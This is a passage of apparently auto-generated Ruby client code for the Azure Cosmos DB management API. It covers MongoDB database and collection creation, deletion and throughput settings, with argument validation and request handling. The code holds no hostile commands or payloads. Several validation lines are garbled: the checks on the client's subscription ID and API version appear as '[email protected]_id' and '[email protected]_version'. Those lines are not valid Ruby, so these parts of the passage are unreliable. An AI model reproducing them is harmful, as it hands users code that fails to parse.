# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
# Send request
promise = begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionGetResults.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Deletes an existing Azure Cosmos DB MongoDB Collection.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
def delete_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
response = delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
nil
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
# Send request
promise = begin_delete_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Gets the RUs per second of the MongoDB collection under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def get_mongo_dbcollection_throughput(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
response = get_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Gets the RUs per second of the MongoDB collection under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def get_mongo_dbcollection_throughput_with_http_info(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
get_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, custom_headers:custom_headers).value!
end
#
# Gets the RUs per second of the MongoDB collection under an existing Azure
# Cosmos DB database account with the provided name.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def get_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:get, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Update the RUs per second of an Azure Cosmos DB MongoDB collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def update_mongo_dbcollection_throughput(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
response = update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB
# collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] promise which provides async access to http
# response.
#
def update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:nil)
# Send request
promise = begin_update_mongo_dbcollection_throughput_async(resource_group_name, account_name, database_name, collection_name, update_throughput_parameters, custom_headers:custom_headers)
promise = promise.then do |response|
# Defining deserialization method.
deserialize_method = lambda do |parsed_response|
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
parsed_response = @client.deserialize(result_mapper, parsed_response)
end
# Waiting for response.
@client.get_long_running_operation_result(response, deserialize_method)
end
promise
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBDatabaseGetResults] operation results.
#
def begin_create_update_mongo_dbdatabase(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
response = begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_update_mongo_dbdatabase_with_http_info(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:custom_headers).value!
end
#
# Create or updates Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param create_update_mongo_dbdatabase_parameters
# [MongoDBDatabaseCreateUpdateParameters] The parameters to provide for the
# current MongoDB database.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_update_mongo_dbdatabase_async(resource_group_name, account_name, database_name, create_update_mongo_dbdatabase_parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'create_update_mongo_dbdatabase_parameters is nil' if create_update_mongo_dbdatabase_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseCreateUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, create_update_mongo_dbdatabase_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBDatabaseGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete_mongo_dbdatabase(resource_group_name, account_name, database_name, custom_headers:nil)
response = begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
nil
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_mongo_dbdatabase_with_http_info(resource_group_name, account_name, database_name, custom_headers:nil)
begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:custom_headers).value!
end
#
# Deletes an existing Azure Cosmos DB MongoDB database.
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_delete_mongo_dbdatabase_async(resource_group_name, account_name, database_name, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 202 || status_code == 204
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Update RUs per second of the an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [ThroughputSettingsGetResults] operation results.
#
def begin_update_mongo_dbdatabase_throughput(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
response = begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Update RUs per second of the an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_mongo_dbdatabase_throughput_with_http_info(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:custom_headers).value!
end
#
# Update RUs per second of the an Azure Cosmos DB MongoDB database
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param update_throughput_parameters [ThroughputSettingsUpdateParameters] The
# RUs per second of the parameters to provide for the current MongoDB database.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_update_mongo_dbdatabase_throughput_async(resource_group_name, account_name, database_name, update_throughput_parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'update_throughput_parameters is nil' if update_throughput_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, update_throughput_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/throughputSettings/default'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
unless status_code == 202 || status_code == 200
error_model = JSON.load(response_content)
fail MsRestAzure::AzureOperationError.new(result.request, http_response, error_model)
end
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::ThroughputSettingsGetResults.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MongoDBCollectionGetResults] operation results.
#
def begin_create_update_mongo_dbcollection(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
response = begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers).value!
response.body unless response.nil?
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_update_mongo_dbcollection_with_http_info(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:custom_headers).value!
end
#
# Create or update an Azure Cosmos DB MongoDB Collection
#
# @param resource_group_name [String] The name of the resource group. The name
# is case insensitive.
# @param account_name [String] Cosmos DB database account name.
# @param database_name [String] Cosmos DB database name.
# @param collection_name [String] Cosmos DB collection name.
# @param create_update_mongo_dbcollection_parameters
# [MongoDBCollectionCreateUpdateParameters] The parameters to provide for the
# current MongoDB Collection.
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def begin_create_update_mongo_dbcollection_async(resource_group_name, account_name, database_name, collection_name, create_update_mongo_dbcollection_parameters, custom_headers:nil)
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, "'@client.subscription_id' should satisfy the constraint - 'MinLength': '1'" if [email protected]_id.nil? && @client.subscription_id.length < 1
fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil?
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MaxLength': '90'" if !resource_group_name.nil? && resource_group_name.length > 90
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'MinLength': '1'" if !resource_group_name.nil? && resource_group_name.length < 1
fail ArgumentError, "'resource_group_name' should satisfy the constraint - 'Pattern': '^[-\w\._\(\)]+$'" if !resource_group_name.nil? && resource_group_name.match(Regexp.new('^^[-\w\._\(\)]+$$')).nil?
fail ArgumentError, 'account_name is nil' if account_name.nil?
fail ArgumentError, "'account_name' should satisfy the constraint - 'MaxLength': '50'" if !account_name.nil? && account_name.length > 50
fail ArgumentError, "'account_name' should satisfy the constraint - 'MinLength': '3'" if !account_name.nil? && account_name.length < 3
fail ArgumentError, "'account_name' should satisfy the constraint - 'Pattern': '^[a-z0-9]+(-[a-z0-9]+)*'" if !account_name.nil? && account_name.match(Regexp.new('^^[a-z0-9]+(-[a-z0-9]+)*$')).nil?
fail ArgumentError, 'database_name is nil' if database_name.nil?
fail ArgumentError, 'collection_name is nil' if collection_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
fail ArgumentError, "'@client.api_version' should satisfy the constraint - 'MinLength': '1'" if [email protected]_version.nil? && @client.api_version.length < 1
fail ArgumentError, 'create_update_mongo_dbcollection_parameters is nil' if create_update_mongo_dbcollection_parameters.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::Cosmosdb::Mgmt::V2020_06_01_preview::Models::MongoDBCollectionCreateUpdateParameters.mapper()
request_content = @client.serialize(request_mapper, create_update_mongo_dbcollection_parameters)
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/mongodbDatabases/{databaseName}/collections/{collectionName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'accountName' => account_name,'databaseName' => database_name,'collectionName' => collection_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
